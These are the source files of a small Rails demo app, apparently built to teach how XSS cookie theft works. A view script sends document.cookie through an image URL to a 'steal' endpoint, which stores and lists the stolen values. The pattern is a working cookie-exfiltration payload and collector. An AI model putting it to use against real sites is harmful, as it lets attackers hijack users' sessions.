config/routes.rb
Rails.application.routes.draw do
  # For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
  resources :cookies do
  	collection do
  		get :steal
  	end
  end

  root "home#index"
end

app/models/application_record.rb
class ApplicationRecord < ActiveRecord::Base
  self.abstract_class = true
end

app/models/cookie.rb
class Cookie < ApplicationRecord
end

app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
  protect_from_forgery with: :exception
end

app/controllers/cookies_controller.rb
class CookiesController < ApplicationController

	def index
	end

	def steal
		if params[:cookies]
			@cookie = Cookie.new
			@cookie.content = params[:cookies]
			@cookie.save
			return "P0wnEd"
		end
	end

	def create
		if params[:cookies]
			@cookie = Cookie.new
			@cookie.content = params[:cookies]
			if @cookie.save
				respond_to do |format|
					format.js
				end
			else
				redirect_to :back
			end
		else
			redirect_to :back
		end
	end
end

app/controllers/home_controller.rb
class HomeController < ApplicationController
	def index
		@cookies = Cookie.all
	end
end

app/helpers/application_helper.rb
module ApplicationHelper
end

app/views/cookies/index.html.erb
<h1>Your cookies have been stolen!</h1>

<div class="some"></div>

<p><%= link_to "Back", root_path %></p>

<script>
	var img = document.createElement("img");
	img.src = "http://localhost:3000/cookies/steal?cookies=" + document.cookie;
	$('.some').append(img);
</script>

app/views/home/index.html.erb
<h1>Steal yo Cookies</h1>

<p>I set a cookie in your browser to "Cat=Meow".</p>

<p>Click below if you want me to steal it and save it to the database.</p>

<p><strong>AJAX cookie stealing:</strong></p>

<p><a href class="steal_cookie">Steal It!</a></p>

<p><strong>LINK tag cookie stealing:</strong></p>

<p><%= link_to "Steal It!", cookies_path %></p>

<p><div class="result"></div></p>

<p>
<h2>Cookies Stolen (<%= @cookies.count %>)</h2>
	<%- @cookies.each do |cookie| %>
		<p><%= cookie.content %></p>
	<% end %>
</p>

app/views/layouts/application.html.erb
<!DOCTYPE html>
<html>
  <head>
    <title>ShowMeTheCookies</title>
    <%= csrf_meta_tags %>

    <%= stylesheet_link_tag    'application', media: 'all', 'data-turbolinks-track': 'reload' %>
    <%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload' %>
  </head>

  <body>
    <%= yield %>
  </body>
</html>